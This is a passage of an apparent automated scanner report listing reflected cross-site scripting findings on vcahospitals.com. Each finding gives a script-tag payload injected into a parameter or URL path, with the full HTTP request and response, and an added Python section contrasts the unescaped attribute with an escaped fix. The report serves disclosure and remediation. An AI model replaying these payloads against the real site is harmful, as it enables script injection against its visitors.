GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3da040b"><script>alert(1)</script>f73da84759e&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:25 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=r8ti6pm5ktq8n70m0nl6japfn5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
52bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3da040b"><script>alert(1)</script>f73da84759e&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.79. http://www.vcahospitals.com/main/offer/ [useragent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de3a3"><script>alert(1)</script>7d71969fe0c was submitted in the useragent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)de3a3"><script>alert(1)</script>7d71969fe0c&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:30 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hmp8degbpu0a9te26g939re5u0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)de3a3"><script>alert(1)</script>7d71969fe0c&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.80. http://www.vcahospitals.com/main/offer/ [variant parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the variant request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e180"><script>alert(1)</script>28aed0a1907 was submitted in the variant parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=1e180"><script>alert(1)</script>28aed0a1907&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=uonisgvh1t257tmgqd61oiinl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
IE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=1e180"><script>alert(1)</script>28aed0a1907&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.81. http://www.vcahospitals.com/main/offer/ [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a500"><script>alert(1)</script>61d16eaa101 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=9a500"><script>alert(1)</script>61d16eaa101 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=lcvbtovbqbfupdtekad2l559v5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=9a500"><script>alert(1)</script>61d16eaa101" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.82. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe76"><script>alert(1)</script>5ff898b7043 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/thank-you.htmlebe76"><script>alert(1)</script>5ff898b7043?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:22:58 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 15209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/thank-you.htmlebe76"><script>alert(1)</script>5ff898b7043?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&stat
...[SNIP]...

2.83. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754ff"><script>alert(1)</script>e83ec5aaa248053f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and to deliver (for example as a link).

Request

GET /main/offer/thank-you.html754ff"><script>alert(1)</script>e83ec5aaa248053f6?fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&ipaddress=173.193.214.243&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&formtype=CORP&newmex=0&date=1307084400&tollfree=866-825-8416 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:22:50 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 15197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/thank-you.html754ff"><script>alert(1)</script>e83ec5aaa248053f6?fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=h
...[SNIP]...
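Root cause visible in 2.82 and 2.83 (and in the form action echoed by 2.79 to 2.81): the application rebuilds the absolute request URL, canary and raw double quote included, and concatenates it into a double-quoted attribute value with no output encoding. The following is an added illustration written for this page, not code from the application or from the scanner. It assumes a hypothetical SITE prefix and a constructed probe URI modelled on the report's canaries, and shows the vulnerable rendering beside the hardened one; the PHP equivalent of the fix on this PHP/5.2 host is htmlspecialchars($uri, ENT_QUOTES, 'UTF-8'). Python's html.parser is used as a stand-in for the browser's tokenizer to show which tags each rendering actually produces.

```python
import html
from html.parser import HTMLParser

# Constructed request URI modelled on the report's probes (not a real capture):
# the canary lands in the query string with a raw double quote that the
# server neither decodes nor encodes.
PROBE_URI = '/marshfield/appt.html?fd2e3"><script>alert(1)</script>47355e93e99=1'

# Hypothetical host prefix; the report shows the absolute URL being rebuilt.
SITE = 'http://www.vcahospitals.com'


def render_uri_field_vulnerable(request_uri):
    """The pattern the report shows: the raw request URI is concatenated
    into a double-quoted attribute value with no output encoding."""
    return ('<input type="hidden" name="uri" id="uri" value="%s%s" />'
            % (SITE, request_uri))


def render_uri_field_fixed(request_uri):
    """Same field, HTML-attribute-encoded on output. quote=True is what
    turns the attacker's closing quote into &quot; (ENT_QUOTES in PHP)."""
    return ('<input type="hidden" name="uri" id="uri" value="%s" />'
            % html.escape(SITE + request_uri, quote=True))


class _Tags(HTMLParser):
    """Collects start tags and their attributes, roughly as a browser's
    tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    """Return [(tag, {attr: value}), ...] for every start tag in markup.
    Attribute values come back entity-decoded."""
    p = _Tags()
    p.feed(markup)
    p.close()
    return p.tags


def script_injected(markup):
    """True if a browser would see a <script> element in this markup."""
    return any(tag == 'script' for tag, _ in parse_tags(markup))


if __name__ == '__main__':
    for name, render in (('vulnerable', render_uri_field_vulnerable),
                         ('fixed', render_uri_field_fixed)):
        out = render(PROBE_URI)
        print(name, 'tags seen by the parser:', [t for t, _ in parse_tags(out)])
```

The check that matters is the last one: after encoding, the parser sees exactly one input element whose decoded value is the original URI, so the canary is stored and round-tripped without ever becoming markup. Encoding must be done at the point of output into the attribute; rejecting quotes on input would not help here because the value is taken from the request line, not from a form field.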

2.84. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f764"><a>39ac731bfc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /manhattan-veterinary-group/appt.html4f764"><a>39ac731bfc3 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
